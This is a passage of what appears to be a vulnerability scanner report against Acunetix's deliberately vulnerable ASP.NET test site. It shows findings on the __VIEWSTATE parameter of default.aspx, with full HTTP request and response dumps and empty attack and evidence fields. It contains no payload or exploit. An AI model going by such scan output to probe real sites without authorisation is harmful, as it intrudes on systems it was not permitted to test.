style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8360&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBASlVTy9oIZGRka1qQj%2FNNU%2Bb4cVU7dv2GoPFrjrA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKOw8XmCQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA3VJTcB32vjU%2BxmC%2Bl%2BAZ9dZwtrz
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:49 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBASlVTy9oIZGRka1qQj/NNU+b4cVU7dv2GoPFrjrA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKOw8XmCQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA3VJTcB32vjU+xmC+l+AZ9dZwtrz" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:White" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8348&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAVVjlwdoIZGRkWZ7RPrxOp818vdHR8sKGilnHEXo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLW0szhCgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA797vhEDwH5NrJVqrpFfWAIoYA8R
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:50 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAVVjlwdoIZGRkWZ7RPrxOp818vdHR8sKGilnHEXo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLW0szhCgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA797vhEDwH5NrJVqrpFfWAIoYA8R" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:White" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a 